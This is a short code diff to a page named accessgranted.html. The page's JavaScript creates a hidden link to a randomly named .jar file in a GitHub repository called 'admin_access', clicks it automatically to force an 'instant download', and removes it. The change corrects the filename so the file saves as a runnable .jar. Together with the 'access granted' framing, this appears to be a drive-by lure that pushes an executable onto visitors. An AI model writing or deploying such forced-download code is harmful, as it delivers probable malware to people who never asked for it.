--- a/accessgranted.html
+++ b/accessgranted.html
@@ -50,7 +50,7 @@
       const link = document.createElement("a");
       // <-- replace this URL with your actual raw GitHub file link
       link.href = "https://github.com/funymaniguess/admin_access/blob/main/file_ujqlpz.jar";
-      link.download = "file_ujq!pz"; // <-- filename for download
+      link.download = "file_ujqlpz.jar"; // <-- filename for download
       document.body.appendChild(link);
       link.click(); // triggers instant download
       document.body.removeChild(link);
